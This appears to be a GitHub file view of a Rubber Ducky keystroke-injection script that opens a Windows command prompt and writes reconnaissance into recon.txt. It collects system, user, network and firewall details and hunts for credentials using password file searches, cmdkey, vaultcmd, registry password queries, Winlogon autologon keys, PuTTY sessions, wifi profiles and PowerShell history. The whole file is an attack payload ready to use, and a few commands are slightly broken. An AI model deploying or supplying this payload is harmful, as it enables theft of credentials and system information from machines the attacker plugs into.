-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathauto-recon.txt
108 lines (108 loc) · 2.05 KB
/
auto-recon.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
LOCALE FR
DELAY 2000
GUI r
DELAY 1000
DELETE
STRING cmd
DELAY 500
ENTER
DELAY 1000
STRING systeminfo > recon.txt
DELAY 500
ENTER
DELAY 3000
STRING whoami /all >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING net users >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING net accounts >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING net share >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING ipconfig /all >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING arp -a >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING netsh advfirewall show allprofiles state >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING netsh advfirewall firewall show rule name=all >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING schtasks /query /fo LIST /v >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING tasklist /SVC >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING dir /s *pass* == *cred* == *.config* == *.xml* >> recon.txt
DELAY 500
ENTER
DELAY 5000
STRING dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.ncnf >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING cmdkey /list >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING vaultcmd /listcreds:"Windows Credentials" /all >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING reg query HKCU /f password /t REG_SZ /s >> recon.txt
DELAY 500
ENTER
DELAY 3000
STRING reg query HKLM /f password /t REG_SZ /s >> recon.txt
DELAY 500
ENTER
DELAY 3000
STRING reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING netsh wlan show profile >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING set >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING exit
DELAY 500
STRING qwinsta >> recon.txt
DELAY 500
ENTER
DELAY 1000
STRING more AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt >> recon.txt
DELAY 500
ENTER
DELAY 1000
ENTER